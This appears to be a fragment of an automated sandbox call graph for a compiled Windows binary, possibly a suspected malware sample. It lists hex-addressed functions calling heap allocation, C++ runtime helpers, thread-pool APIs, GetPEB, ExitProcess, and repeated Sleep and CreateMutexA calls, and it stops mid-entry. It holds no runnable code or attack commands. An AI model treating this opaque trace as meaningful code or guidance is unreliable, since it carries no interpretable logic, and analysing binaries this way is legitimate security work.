calls 10907->10908 10910 f99b8d 10908->10910 10911 fa8220 RtlAllocateHeap 10910->10911 10912 f99b9c 10911->10912 10913 fa7a00 RtlAllocateHeap 10912->10913 10914 f99ca9 10913->10914 10915 f95c10 4 API calls 10914->10915 10916 f99cb1 10915->10916 10917 f98b30 4 API calls 10916->10917 10918 f99cc2 10917->10918 10919 fa8220 RtlAllocateHeap 10918->10919 10920 f99cd1 10919->10920 10921 f942b0 10924 f93ac0 10921->10924 10923 f942bb shared_ptr 10925 f93af9 10924->10925 10926 fc6c6a RtlAllocateHeap 10925->10926 10927 f93b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10925->10927 10928 f93be6 10926->10928 10927->10923 10933 f93c38 10928->10933 10945 f932d0 10928->10945 10929 f932d0 6 API calls 10932 f93c5f 10929->10932 10931 f93c68 10931->10923 10932->10931 10964 f93810 10932->10964 10933->10929 10933->10932 10946 fac6ac GetSystemTimePreciseAsFileTime 10945->10946 10953 f93314 10946->10953 10947 f9336b 10948 fac26a 5 API calls 10947->10948 10949 f9333c __Mtx_unlock 10948->10949 10951 fac26a 5 API calls 10949->10951 10954 f93350 std::future_error::future_error 10949->10954 10950 fabd4c GetSystemTimePreciseAsFileTime 10950->10953 10952 f93377 10951->10952 10955 fac6ac GetSystemTimePreciseAsFileTime 10952->10955 10953->10947 10953->10949 10953->10950 10954->10933 10956 f933af 10955->10956 10957 fac26a 5 API calls 10956->10957 10958 f933b6 __Cnd_broadcast 10956->10958 10957->10958 10959 fac26a 5 API calls 10958->10959 10960 f933d7 __Mtx_unlock 10958->10960 10959->10960 10961 fac26a 5 API calls 10960->10961 10962 f933eb 10960->10962 10963 f9340e 10961->10963 10962->10933 10963->10933 10965 f9381c 10964->10965 10968 f92440 10965->10968 10971 fab5d6 10968->10971 10970 f92472 10972 fab5f1 std::_Throw_future_error 10971->10972 10973 fc8bec __cftof 4 API calls 10972->10973 10975 fab658 __cftof std::future_error::future_error 10972->10975 10974 fab69f 10973->10974 10975->10970 10976 f95cad 10978 f95caf shared_ptr 10976->10978 10977 f95d17 shared_ptr std::future_error::future_error 10978->10977 10979 fc6c6a RtlAllocateHeap 10978->10979 10980 f95d47 __cftof 10979->10980 10980->10980 10981 fa80c0 RtlAllocateHeap 10980->10981 10983 f95e3e 10981->10983 10982 f95ea6 shared_ptr std::future_error::future_error 10983->10982 10984 fc6c6a RtlAllocateHeap 10983->10984 10985 f95ed2 10984->10985 10986 f95ffe shared_ptr std::future_error::future_error 10985->10986 10987 fc6c6a RtlAllocateHeap 10985->10987 10988 f9601b 10987->10988 10989 fa80c0 RtlAllocateHeap 10988->10989 10990 f96089 10989->10990 10991 fa80c0 RtlAllocateHeap 10990->10991 10992 f960bd 10991->10992 10993 fa80c0 RtlAllocateHeap 10992->10993 10994 f960ee 10993->10994 10995 fa80c0 RtlAllocateHeap 10994->10995 10996 f9611f 10995->10996 10997 fa80c0 RtlAllocateHeap 10996->10997 10999 f96150 10997->10999 10998 f965b1 shared_ptr std::future_error::future_error 10999->10998 11000 fc6c6a RtlAllocateHeap 10999->11000 11001 f965dc 11000->11001 11002 fa7a00 RtlAllocateHeap 11001->11002 11003 f966a6 11002->11003 11004 f95c10 4 API calls 11003->11004 11005 f966ac 11004->11005 11006 f95c10 4 API calls 11005->11006 11007 f966b1 11006->11007 11008 f922c0 4 API calls 11007->11008 11009 f966c9 shared_ptr 11008->11009 11010 fa7a00 RtlAllocateHeap 11009->11010 11011 f96732 11010->11011 11012 f95c10 4 API calls 11011->11012 11013 f9673d 11012->11013 11014 f922c0 4 API calls 11013->11014 11023 f96757 shared_ptr 11014->11023 11015 f96852 11016 fa80c0 RtlAllocateHeap 11015->11016 11018 f9689c 11016->11018 11017 fa7a00 RtlAllocateHeap 11017->11023 11019 fa80c0 RtlAllocateHeap 11018->11019 11022 f968e3 shared_ptr std::future_error::future_error 11019->11022 11020 f95c10 4 API calls 11020->11023 11021 f922c0 4 API calls 11021->11023 11023->11015 11023->11017 11023->11020 11023->11021 11064 f920a0 11065 fac68b __Mtx_init_in_situ 2 API calls 11064->11065 11066 f920ac 11065->11066 11067 fad64e RtlAllocateHeap 11066->11067 11068 f920b6 11067->11068 11049 f934a0 11050 f934aa 11049->11050 11051 f934ca shared_ptr 11049->11051 11050->11051 11052 fc6c6a RtlAllocateHeap 11050->11052 11053 f934f2 11052->11053 11055 f93537 shared_ptr 11053->11055 11057 fac17c 11053->11057 11058 fac18a Concurrency::cancel_current_task std::_Throw_future_error 11057->11058 11061 fac0e9 11058->11061 11060 fac1aa std::_Throw_future_error 11062 f922e0 std::future_error::future_error RtlAllocateHeap 11061->11062 11063 fac0fb 11062->11063 11063->11060 11084 f95a9e 11086 f95a61 11084->11086 11085 fa80c0 RtlAllocateHeap 11085->11086 11086->11084 11086->11085 11088 fa7a00 RtlAllocateHeap 11086->11088 11089 f95bdd std::future_error::future_error 11086->11089 11090 f95730 11086->11090 11088->11086 11096 f95860 shared_ptr 11090->11096 11098 f95799 shared_ptr 11090->11098 11091 f9592a 11099 fa8200 11091->11099 11093 fa80c0 RtlAllocateHeap 11093->11098 11094 f95900 shared_ptr std::future_error::future_error 11094->11086 11095 fc6c6a RtlAllocateHeap 11097 f95934 11095->11097 11096->11094 11096->11095 11098->11091 11098->11093 11098->11096 11102 fac1d9 11099->11102 11101 fa820a 11105 fac15d 11102->11105 11104 fac1ea std::_Throw_future_error 11104->11101 11106 f922e0 std::future_error::future_error RtlAllocateHeap 11105->11106 11107 fac16f 11106->11107 11107->11104 11115 f93c8e 11116 f93c98 11115->11116 11117 f93cb4 11116->11117 11134 f92410 11116->11134 11120 f93810 4 API calls 11117->11120 11122 f93ccf 11120->11122 11123 f93810 4 API calls 11122->11123 11124 f93cdb 11123->11124 11127 f93d52 11124->11127 11149 fa7d50 11124->11149 11126 fad3e2 RtlAllocateHeap 11128 f93d84 11126->11128 11127->11126 11129 fa7d50 RtlAllocateHeap 11128->11129 11131 f93e03 11128->11131 11129->11131 11130 f93e9b shared_ptr 11131->11130 11132 fc6c6a RtlAllocateHeap 11131->11132 11133 f93ec1 11132->11133 11135 f92424 11134->11135 11181 fab52d 11135->11181 11138 f93ce0 11139 f93d42 11138->11139 11142 f93d52 11138->11142 11140 fa7d50 RtlAllocateHeap 11139->11140 11140->11142 11141 fad3e2 RtlAllocateHeap 11143 f93d84 11141->11143 11142->11141 11144 fa7d50 RtlAllocateHeap 11143->11144 11146 f93e03 11143->11146 11144->11146 11145 f93e9b shared_ptr 11145->11117 11146->11145 11147 fc6c6a RtlAllocateHeap 11146->11147 11148 f93ec1 11147->11148 11150 fa7dcb 11149->11150 11151 fa7d62 11149->11151 11154 f92480 RtlAllocateHeap 11150->11154 11152 fa7d9c 11151->11152 11153 fa7d6d 11151->11153 11157 fa7db9 11152->11157 11160 fad3e2 RtlAllocateHeap 11152->11160 11153->11150 11156 fa7d74 11153->11156 11155 fa7d7a 11154->11155 11158 fc6c6a RtlAllocateHeap 11155->11158 11163 fa7d83 11155->11163 11159 fad3e2 RtlAllocateHeap 11156->11159 11157->11127 11161 fa7dd5 11158->11161 11159->11155 11162 fa7da6 11160->11162 11164 fa7f20 11161->11164 11166 fa7e01 11161->11166 11168 fa7f1b 11161->11168 11169 fa7e80 11161->11169 11170 fa7ea7 11161->11170 11162->11127 11163->11127 11165 fa9270 RtlAllocateHeap 11164->11165 11177 fa7e91 __cftof 11165->11177 11166->11127 11167 fc6c6a RtlAllocateHeap 11176 fa7f2a __cftof 11167->11176 11171 f92480 RtlAllocateHeap 11168->11171 11169->11168 11172 fa7e8b 11169->11172 11174 fad3e2 RtlAllocateHeap 11170->11174 11170->11177 11171->11164 11173 fad3e2 RtlAllocateHeap 11172->11173 11173->11177 11174->11177 11175 fa7f61 shared_ptr 11175->11127 11176->11175 11178 fc6c6a RtlAllocateHeap 11176->11178 11177->11167 11179 fa7f02 shared_ptr 11177->11179 11180 fa7f7c 11178->11180 11179->11127 11189 fc3aed 11181->11189 11183 f9242a 11183->11138 11184 fab5a5 ___std_exception_copy 11196 fab1ad 11184->11196 11185 fab598 11192 faaf56 11185->11192 11200 fc4f29 11189->11200 11191 fab555 11191->11183 11191->11184 11191->11185 11193 faaf9f ___std_exception_copy 11192->11193 11195 faafb2 shared_ptr 11193->11195 11212 fab39f 11193->11212 11195->11183 11197 fab1d8 11196->11197 11199 fab1e1 shared_ptr 11196->11199 11198 fab39f 5 API calls 11197->11198 11198->11199 11199->11183 11207 fc4f37 11200->11207 11202 fc4f2e __cftof 11202->11191 11203 fcd634 __cftof 4 API calls 11202->11203 11204 fc8bfc ___std_exception_copy 11202->11204 11203->11204 11205 fc65ed __cftof 3 API calls 11204->11205 11206 fc8c2f 11205->11206 11208 fc4f40 11207->11208 11209 fc4f43 11207->11209 11208->11202 11210 fc8ba3 ___std_exception_destroy RtlAllocateHeap 11209->11210 11211 fc4f77 11209->11211 11210->11211 11211->11202 11213 fabedf InitOnceExecuteOnce 11212->11213 11214 fab3e1 11213->11214 11215 fab3e8 11214->11215 11223 fc6cbb 11214->11223 11215->11195 11224 fc6cc7 __dosmaperr 11223->11224 11225 fca671 __cftof 4 API calls 11224->11225 11228 fc6ccc 11225->11228 11226 fc8bec __cftof 4 API calls 11227 fc6cf6 11226->11227 11228->11226 11269 fa8680 11270 fa86e0 11269->11270 11270->11270 11278 fa7760 11270->11278 11272 fa86f9 11273 fa8f40 RtlAllocateHeap 11272->11273 11274 fa8714 11272->11274 11273->11274 11275 fa8f40 RtlAllocateHeap 11274->11275 11277 fa8769 11274->11277 11276 fa87b1 11275->11276 11280 fa777b 11278->11280 11291 fa7864 shared_ptr __cftof 11278->11291 11279 fa78f1 11281 fa9270 RtlAllocateHeap 11279->11281 11280->11279 11284 fa77ea 11280->11284 11285 fa7811 11280->11285 11290 fa77fb __cftof 11280->11290 11280->11291 11282 fa78f6 11281->11282 11283 f92480 RtlAllocateHeap 11282->11283 11286 fa78fb 11283->11286 11284->11282 11288 fad3e2 RtlAllocateHeap 11284->11288 11287 fad3e2 RtlAllocateHeap 11285->11287 11285->11290 11287->11290 11288->11290 11289 fc6c6a RtlAllocateHeap 11289->11279 11290->11289 11290->11291 11291->11272 11292 f9a682 11295 f9a68a shared_ptr 11292->11295 11293 f9a75d shared_ptr 11300 fa80c0 RtlAllocateHeap 11293->11300 11294 f9a949 11296 f9a94e 11294->11296 11297 fc6c6a RtlAllocateHeap 11294->11297 11295->11293 11295->11294 11298 f9a953 Sleep CreateMutexA 11296->11298 11299 fc6c6a RtlAllocateHeap 11296->11299 11297->11296 11301 f9a98e 11298->11301 11299->11298 11302 f9a903 11300->11302 11303 f9a079 11304 f9a081 shared_ptr 11303->11304 11305 f9a154 shared_ptr 11304->11305 11306 f9a930 11304->11306 11309 fa80c0 RtlAllocateHeap 11305->11309 11307 fc6c6a RtlAllocateHeap 11306->11307 11308 f9a953 Sleep CreateMutexA 11307->11308 11310 f9a98e 11308->11310 11311 f9a903 11309->11311 11312 f9cc79 11313 f9cc84 shared_ptr 11312->11313 11314 f9ccda shared_ptr std::future_error::future_error 11313->11314 11315 fc6c6a RtlAllocateHeap 11313->11315 11316 f9ce36 11315->11316 11317 fa7a00 RtlAllocateHeap 11316->11317 11318 f9ce92 11317->11318 11319 f95c10 4 API calls 11318->11319 11320 f9ce9d 11319->11320 11322 f9ca70 11320->11322 11323 f9cadd 11322->11323 11324 fa7a00 RtlAllocateHeap 11323->11324 11325 f9cc87 11323->11325 11327 f9ccee 11324->11327 11326 f9ccda shared_ptr std::future_error::future_error 11325->11326 11330 fc6c6a RtlAllocateHeap 11325->11330 11328 f95c10 4 API calls 11327->11328 11329 f9ccf9 11328->11329 11342 f99030 11329->11342 11332 f9ce36 11330->11332 11334 fa7a00 RtlAllocateHeap 11332->11334 11333 f9cd0d 11335 fa8220 RtlAllocateHeap 11333->11335 11336 f9ce92 11334->11336 11337 f9cd1f 11335->11337 11338 f95c10 4 API calls 11336->11338 11341 fa8f40 RtlAllocateHeap 11337->11341 11339 f9ce9d 11338->11339 11340 f9ca70 4 API calls 11339->11340 11341->11325 11343 f99080 11342->11343 11344 fa7a00 RtlAllocateHeap 11343->11344 11345 f9908f 11344->11345 11346 f95c10 4 API calls 11345->11346 11347 f9909a 11346->11347 11348 fa80c0 RtlAllocateHeap 11347->11348 11349 f990ec 11348->11349 11350 fa8220 RtlAllocateHeap 11349->11350 11352 f990fe shared_ptr 11350->11352 11351 f9917e shared_ptr std::future_error::future_error 11351->11333 11352->11351 11353 fc6c6a RtlAllocateHeap 11352->11353 11354 f991aa 11353->11354 11364 f94276 11365 f92410 5 API calls 11364->11365 11366 f9427f 11365->11366 11367 f93ce0 RtlAllocateHeap 11366->11367 11368 f9428f 11367->11368 11414 fabe50 11417 fabd8b 11414->11417 11416 fabe66 std::_Throw_future_error 11418 f922e0 std::future_error::future_error RtlAllocateHeap 11417->11418 11419 fabd9f 11418->11419 11419->11416 9745 f9a856 9746 f9a870 9745->9746 9753 f9a892 shared_ptr 9745->9753 9747 f9a94e 9746->9747 9746->9753 9748 f9a953 Sleep CreateMutexA 9747->9748 9769 fc6c6a 9747->9769 9752 f9a98e 9748->9752 9751 f9a903 9754 fa80c0 9753->9754 9757 fa8104 9754->9757 9758 fa80de 9754->9758 9755 fa81ee 9777 fa9270 9755->9777 9757->9755 9760 fa8158 9757->9760 9761 fa817d 9757->9761 9758->9751 9759 fa81f3 9780 f92480 9759->9780 9760->9759 9772 fad3e2 9760->9772 9765 fad3e2 RtlAllocateHeap 9761->9765 9766 fa8169 __cftof 9761->9766 9765->9766 9767 fa81d0 shared_ptr 9766->9767 9768 fc6c6a RtlAllocateHeap 9766->9768 9767->9751 9768->9755 9770 fc6bf6 ___std_exception_copy RtlAllocateHeap 9769->9770 9771 fc6c79 ___std_exception_copy 9770->9771 9773 f92480 __dosmaperr ___std_exception_copy std::_Throw_future_error 9772->9773 9776 fad401 std::_Throw_future_error 9773->9776 9784 fc38af 9773->9784 9776->9766 9873 fac1b9 9777->9873 9781 f9248e std::_Throw_future_error 9780->9781 9782 fc38af ___std_exception_copy RtlAllocateHeap 9781->9782 9783 f924c3 9782->9783 9785 fc38bc ___std_exception_copy 9784->9785 9788 f924c3 9784->9788 9785->9788 9789 fc38e9 9785->9789 9790 fca1f1 9785->9790 9788->9766 9799 fc8ba3 9789->9799 9791 fca1fe 9790->9791 9792 fca20c 9790->9792 9791->9792 9797 fca223 9791->9797 9802 fc75f6 9792->9802 9794 fca214 9805 fc6c5a 9794->9805 9796 fca21e 9796->9789 9797->9796 9798 fc75f6 __dosmaperr RtlAllocateHeap 9797->9798 9798->9794 9800 fcadf5 __freea RtlAllocateHeap 9799->9800 9801 fc8bbb 9800->9801 9801->9788 9808 fca7c8 9802->9808 9867 fc6bf6 9805->9867 9807 fc6c66 9807->9796 9809 fca7d2 __dosmaperr 9808->9809 9811 fc75fb 9809->9811 9819 fcd82f 9809->9819 9811->9794 9812 fca813 __dosmaperr 9813 fca81b __dosmaperr 9812->9813 9814 fca853 9812->9814 9823 fcadf5 9813->9823 9827 fca49f 9814->9827 9818 fcadf5 __freea RtlAllocateHeap 9818->9811 9822 fcd83c __dosmaperr 9819->9822 9820 fcd867 RtlAllocateHeap 9821 fcd87a __dosmaperr 9820->9821 9820->9822 9821->9812 9822->9820 9822->9821 9824 fcae00 9823->9824 9826 fcae1b __dosmaperr 9823->9826 9825 fc75f6 __dosmaperr RtlAllocateHeap 9824->9825 9824->9826 9825->9826 9826->9811 9828 fca50d __dosmaperr 9827->9828 9831 fca445 9828->9831 9830 fca536 9830->9818 9832 fca451 __dosmaperr 9831->9832 9835 fca626 9832->9835 9834 fca473 __dosmaperr 9834->9830 9836 fca65c __cftof 9835->9836 9837 fca635 __cftof 9835->9837 9836->9834 9837->9836 9839 fcf35f 9837->9839 9840 fcf3df 9839->9840 9844 fcf375 9839->9844 9841 fcf42d 9840->9841 9843 fcadf5 __freea RtlAllocateHeap 9840->9843 9842 fcf4d0 __cftof RtlAllocateHeap 9841->9842 9863 fcf43b 9842->9863 9846 fcf401 9843->9846 9844->9840 9845 fcf3a8 9844->9845 9849 fcadf5 __freea RtlAllocateHeap 9844->9849 9847 fcf3ca 9845->9847 9854 fcadf5 __freea RtlAllocateHeap 9845->9854 9848 fcadf5 __freea RtlAllocateHeap 9846->9848 9851 fcadf5 __freea RtlAllocateHeap 9847->9851 9850 fcf414 9848->9850 9853 fcf39d 9849->9853 9855 fcadf5 __freea RtlAllocateHeap 9850->9855 9856 fcf3d4 9851->9856 9852 fcf49b 9858 fcadf5 __freea RtlAllocateHeap 9852->9858 9859 fcef3c ___free_lconv_mon RtlAllocateHeap 9853->9859 9860 fcf3bf 9854->9860 9861 fcf422 9855->9861 9857 fcadf5 __freea RtlAllocateHeap 9856->9857 9857->9840 9862 fcf4a1 9858->9862 9859->9845 9864 fcf03a __cftof RtlAllocateHeap 9860->9864 9865 fcadf5 __freea RtlAllocateHeap 9861->9865 9862->9836 9863->9852 9866 fcadf5 RtlAllocateHeap __freea 9863->9866 9864->9847 9865->9841 9866->9863 9868 fca7c8 __dosmaperr RtlAllocateHeap 9867->9868 9870 fc6c01 ___std_exception_copy 9868->9870 9869 fc6c0f 9869->9807 9870->9869 9871 fc6bf6 ___std_exception_copy RtlAllocateHeap 9870->9871 9872 fc6c66 9871->9872 9872->9807 9876 fac123 9873->9876 9875 fac1ca std::_Throw_future_error 9879 f922e0 9876->9879 9878 fac135 9878->9875 9880 fc38af ___std_exception_copy RtlAllocateHeap 9879->9880 9881 f92317 std::future_error::future_error 9880->9881 9881->9878 11420 fc6a44 11421 fc6a5c 11420->11421 11422 fc6a52 11420->11422 11438 fc698d 11421->11438 11433 fcb655 11422->11433 11425 fc6a59 11426 fc6a76 11441 fc68ed 11426->11441 11429 fcb655 RtlAllocateHeap 11430 fc6a8a 11429->11430 11431 fc6aa8 11430->11431 11432 fcadf5 __freea RtlAllocateHeap 11430->11432 11432->11431 11434 fcb662 11433->11434 11435 fcb679 11434->11435 11444 fc75c0 11434->11444 11435->11425 11439 fc690a __cftof 4 API calls 11438->11439 11440 fc699f 11439->11440 11440->11426 11452 fc683b 11441->11452 11449 fc75e3 11444->11449 11446 fc75cb __dosmaperr 11447 fc75f6 __dosmaperr RtlAllocateHeap 11446->11447 11448 fc75de 11447->11448 11448->11425 11450 fca7c8 __dosmaperr RtlAllocateHeap 11449->11450 11451 fc75e8 11450->11451 11451->11446 11453 fc6849 11452->11453 11454 fc6863 11452->11454 11465 fc69cc 11453->11465 11455 fc686a 11454->11455 11458 fc6889 __cftof 11454->11458 11462 fc6853 11455->11462 11469 fc69e6 11455->11469 11459 fc689f __cftof 11458->11459 11460 fc69e6 RtlAllocateHeap 11458->11460 11461 fc75c0 __dosmaperr RtlAllocateHeap 11459->11461 11459->11462 11460->11459 11463 fc68ab 11461->11463 11462->11429 11462->11430 11464 fc75f6 __dosmaperr RtlAllocateHeap 11463->11464 11464->11462 11466 fc69df 11465->11466 11467 fc69d7 11465->11467 11466->11462 11468 fcadf5 __freea RtlAllocateHeap 11467->11468 11468->11466 11470 fc69cc RtlAllocateHeap 11469->11470 11471 fc69f4 11470->11471 11474 fc6a25 11471->11474 11475 fcb04b __cftof RtlAllocateHeap 11474->11475 11476 fc6a05 11475->11476 11476->11462 11500 f93440 11505 f92b30 11500->11505 11502 f9344f std::_Throw_future_error 11503 fc38af ___std_exception_copy RtlAllocateHeap 11502->11503 11504 f93483 11503->11504 11506 fc38af ___std_exception_copy RtlAllocateHeap 11505->11506 11507 f92b68 std::future_error::future_error 11506->11507 11507->11502 11508 f93840 11509 f9385f 11508->11509 11510 f938f6 11508->11510 11509->11510 11511 f93920 11509->11511 11513 f938cd shared_ptr 11509->11513 11516 f9391b 11509->11516 11518 fa91e0 11511->11518 11515 fa7d50 RtlAllocateHeap 11513->11515 11514 f93925 11515->11510 11517 fc6c6a RtlAllocateHeap 11516->11517 11517->11511 11519 fac1b9 RtlAllocateHeap 11518->11519 11520 fa91ea 11519->11520 11520->11514 11541 f93c47 11542 f93c51 11541->11542 11544 f932d0 6 API calls 11542->11544 11545 f93c5f 11542->11545 11543 f93c68 11544->11545 11545->11543 11546 f93810 4 API calls 11545->11546 11547 f93cdb 11546->11547 11548 fa7d50 RtlAllocateHeap 11547->11548 11550 f93d52 11547->11550 11548->11550 11549 fad3e2 RtlAllocateHeap 11551 f93d84 11549->11551 11550->11549 11552 fa7d50 RtlAllocateHeap 11551->11552 11554 f93e03 11551->11554 11552->11554 11553 f93e9b shared_ptr 11554->11553 11555 fc6c6a RtlAllocateHeap 11554->11555 11556 f93ec1 11555->11556 9725 fcd82f 9728 fcd83c __dosmaperr 9725->9728 9726 fcd867 RtlAllocateHeap 9727 fcd87a __dosmaperr 9726->9727 9726->9728 9728->9726 9728->9727 9729 fc6629 9732 fc64c7 9729->9732 9734 fc64d5 __cftof 9732->9734 9733 fc6520 9734->9733 9737 fc652b 9734->9737 9736 fc652a 9743 fca302 GetPEB 9737->9743 9739 fc6535 9740 fc654a __cftof 9739->9740 9741 fc653a GetPEB 9739->9741 9742 fc6562 ExitProcess 9740->9742 9741->9740 9744 fca31c __cftof 9743->9744 9744->9739 11575 f91020 11576 fa80c0 RtlAllocateHeap 11575->11576 11577 f91031 11576->11577 11578 fad64e RtlAllocateHeap 11577->11578 11579 f9103b 11578->11579 11603 f9a418 11604 f9a420 shared_ptr 11603->11604 11605 f9a4f3 shared_ptr 11604->11605 11606 f9a93f 11604->11606 11610 fa80c0 RtlAllocateHeap 11605->11610 11607 fc6c6a RtlAllocateHeap 11606->11607 11608 f9a944 11607->11608 11609 fc6c6a RtlAllocateHeap 11608->11609 11611 f9a949 11609->11611 11612 f9a903 11610->11612 11613 f9a94e 11611->11613 11614 fc6c6a RtlAllocateHeap 11611->11614 11615 f9a953 Sleep CreateMutexA 11613->11615 11616 fc6c6a RtlAllocateHeap 11613->11616 11614->11613 11617 f9a98e 11615->11617 11616->11615 11629 f91000 11630 fad64e RtlAllocateHeap 11629->11630 11631 f9100a 11630->11631 11637 f92e00 11638 f92e28 11637->11638 11639 fac68b __Mtx_init_in_situ 2 API calls 11638->11639 11640 f92e33 11639->11640 11671 f955f0 11672 f95610 11671->11672 11673 f922c0 4 API calls 11672->11673 11674 f95710 std::future_error::future_error 11672->11674 11673->11672 11675 f943f0 11676 fabedf InitOnceExecuteOnce 11675->11676 11677 f9440a 11676->11677 11678 f94411 11677->11678 11679 fc6cbb 4 API calls 11677->11679 11680 f94424 11679->11680 11721 f93fe0 11722 f94022 11721->11722 11723 f9408c 11722->11723 11724 f940d2 11722->11724 11727 f94035 std::future_error::future_error 11722->11727 11728 f935e0 11723->11728 11739 f93ee0 11724->11739 11729 fad3e2 RtlAllocateHeap 11728->11729 11730 f93616 11729->11730 11731 f9364e 11730->11731 11732 f93691 11730->11732 11734 fac17c Concurrency::cancel_current_task RtlAllocateHeap 11731->11734 11738 f93663 shared_ptr std::future_error::future_error 11731->11738 11745 f92ce0 11732->11745 11736 f93720 11734->11736 11735 f9369e 11735->11738 11754 f92c00 11735->11754 11736->11727 11738->11727 11740 f93f48 11739->11740 11741 f93f1e 11739->11741 11742 f93f58 11740->11742 11743 f92c00 4 API calls 11740->11743 11741->11727 11742->11727 11744 f93f7f 11743->11744 11744->11727 11746 f92d1d 11745->11746 11747 fabedf InitOnceExecuteOnce 11746->11747 11748 f92d46 11747->11748 11749 f92d51 std::future_error::future_error 11748->11749 11750 f92d88 11748->11750 11764 fabef7 11748->11764 11749->11735 11752 f92440 4 API calls 11750->11752 11753 f92d9b 11752->11753 11753->11735 11755 fad3e2 RtlAllocateHeap 11754->11755 11756 f92c0e 11755->11756 11789 fab847 11756->11789 11758 f92c42 11759 f92c49 11758->11759 11795 f92c80 11758->11795 11759->11738 11761 f92c58 11798 f92560 11761->11798 11763 f92c65 std::_Throw_future_error 11765 fabf03 11764->11765 11773 f92900 11765->11773 11767 fabf23 std::_Throw_future_error 11768 fabf6a 11767->11768 11769 fabf73 11767->11769 11783 fabe7f 11768->11783 11771 f92ae0 5 API calls 11769->11771 11772 fabf6f 11771->11772 11772->11750 11774 fa80c0 RtlAllocateHeap 11773->11774 11775 f9294f 11774->11775 11776 f926b0 RtlAllocateHeap 11775->11776 11778 f92967 11776->11778 11777 f9298d shared_ptr 11777->11767 11778->11777 11779 fc6c6a RtlAllocateHeap 11778->11779 11780 f929b6 11779->11780 11781 fc38af ___std_exception_copy RtlAllocateHeap 11780->11781 11782 f929e4 11781->11782 11782->11767 11784 facc31 InitOnceExecuteOnce 11783->11784 11786 fabe97 11784->11786 11785 fabe9e 11785->11772 11786->11785 11787 fc6cbb 4 API calls 11786->11787 11788 fabea7 11787->11788 11788->11772 11790 fab854 11789->11790 11794 fab873 Concurrency::details::_Reschedule_chore 11789->11794 11801 facb77 11790->11801 11792 fab864 11792->11794 11803 fab81e 11792->11803 11794->11758 11809 fab7fb 11795->11809 11797 f92cb2 shared_ptr 11797->11761 11799 fc38af ___std_exception_copy RtlAllocateHeap 11798->11799 11800 f92597 std::future_error::future_error 11799->11800 11800->11763 11802 facb92 CreateThreadpoolWork 11801->11802 11802->11792 11804 fab827 Concurrency::details::_Reschedule_chore 11803->11804 11807 facdcc 11804->11807 11806 fab841 11806->11794 11808 facde1 TpPostWork 11807->11808 11808->11806 11810 fab817 11809->11810 11811 fab807 11809->11811 11810->11797 11811->11810 11813 faca78 11811->11813 11814 faca8d TpReleaseWork 11813->11814 11814->11810 11815 fa8de0 11816 fa8f2f 11815->11816 11817 fa8e05 11815->11817 11818 fa9270 RtlAllocateHeap 11816->11818 11821 fa8e4c 11817->11821 11822 fa8e76 11817->11822 11819 fa8f34 11818->11819 11820 f92480 RtlAllocateHeap 11819->11820 11828 fa8e5d __cftof 11820->11828 11821->11819 11823 fa8e57 11821->11823 11826 fad3e2 RtlAllocateHeap 11822->11826 11822->11828 11825 fad3e2 RtlAllocateHeap 11823->11825 11824 fc6c6a RtlAllocateHeap 11827 fa8f3e 11824->11827 11825->11828 11826->11828 11828->11824 11829 fa8eed shared_ptr __cftof 11828->11829 11830 fa85e0 11831 fa85f6 11830->11831 11831->11831 11832 fa860b 11831->11832 11833 fa8f40 RtlAllocateHeap 11831->11833 11833->11832 11834 f987d0 11835 f988d3 11834->11835 11843 f98819 shared_ptr 11834->11843 11836 fa80c0 RtlAllocateHeap 11835->11836 11839 f98923 11836->11839 11837 f9896c 11838 fa8200 RtlAllocateHeap 11837->11838 11842 f98971 11838->11842 11840 f98949 shared_ptr 11839->11840 11844 fc6c6a RtlAllocateHeap 11839->11844 11841 fa80c0 RtlAllocateHeap 11841->11843 11843->11835 11843->11837 11843->11839 11843->11841 11844->11837 11865 f921c0 11866 f921cb 11865->11866 11867 f921d0 11865->11867 11868 f921d4 11867->11868 11873 f921ec __cftof 11867->11873 11869 fc75f6 __dosmaperr RtlAllocateHeap 11868->11869 11870 f921d9 11869->11870 11872 fc6c5a ___std_exception_copy RtlAllocateHeap 11870->11872 11871 f921fc __cftof 11874 f921e4 11872->11874 11873->11871 11875 f9223a 11873->11875 11876 f92221 11873->11876 11877 f92231 11875->11877 11879 fc75f6 __dosmaperr RtlAllocateHeap 11875->11879 11878 fc75f6 __dosmaperr RtlAllocateHeap 11876->11878 11880 f92226 11878->11880 11881 f92247 11879->11881 11882 fc6c5a ___std_exception_copy RtlAllocateHeap 11880->11882 11883 fc6c5a ___std_exception_copy RtlAllocateHeap 11881->11883 11882->11877 11884 f92252 11883->11884 11908 fa79c0 11909 fa79e0 11908->11909 11909->11909 11910 fa80c0 RtlAllocateHeap 11909->11910 11911 fa79f2 11910->11911 11916 fa83c0 11917 fa7760 RtlAllocateHeap 11916->11917 11918 fa8439 11917->11918 11919 fa8f40 RtlAllocateHeap 11918->11919 11920 fa8454 11918->11920 11919->11920 11921 fa8f40 RtlAllocateHeap 11920->11921 11923 fa84a8 11920->11923 11922 fa84ee 11921->11922 11924 fc8bbe 11925 fc8868 4 API calls 11924->11925 11926 fc8bdc 11925->11926 11927 f9b7b1 11928 f9b7be 11927->11928 11929 fa7a00 RtlAllocateHeap 11928->11929 11930 f9b7f3 11929->11930 11931 fa7a00 RtlAllocateHeap 11930->11931 11932 f9b80b 11931->11932 11933 fa7a00 RtlAllocateHeap 11932->11933 11934 f9b823 11933->11934 11935 fa7a00 RtlAllocateHeap 11934->11935 11936 f9b835 11935->11936 11941 fc67b7 11942 fc67c3 __dosmaperr 11941->11942 11943 fc67cd 11942->11943 11947 fc67e2 11942->11947 11944 fc75f6 __dosmaperr RtlAllocateHeap 11943->11944 11946 fc67d2 11944->11946 11945 fc67dd 11948 fc6c5a ___std_exception_copy RtlAllocateHeap 11946->11948 11947->11945 11950 fc6740 11947->11950 11948->11945 11951 fc674d 11950->11951 11952 fc6762 11950->11952 11953 fc75f6 __dosmaperr RtlAllocateHeap 11951->11953 11958 fc675d 11952->11958 11966 fca038 11952->11966 11955 fc6752 11953->11955 11957 fc6c5a ___std_exception_copy RtlAllocateHeap 11955->11957 11957->11958 11958->11945 11962 fc6785 11983 fcaebb 11962->11983 11965 fcadf5 __freea RtlAllocateHeap 11965->11958 11967 fca050 11966->11967 11971 fc6777 11966->11971 11968 fcafe4 RtlAllocateHeap 11967->11968 11967->11971 11969 fca06e 11968->11969 11998 fd0439 11969->11998 11972 fcb00b 11971->11972 11973 fc677f 11972->11973 11974 fcb022 11972->11974 11976 fcafe4 11973->11976 11974->11973 11975 fcadf5 __freea RtlAllocateHeap 11974->11975 11975->11973 11977 fcb005 11976->11977 11978 fcaff0 11976->11978 11977->11962 11979 fc75f6 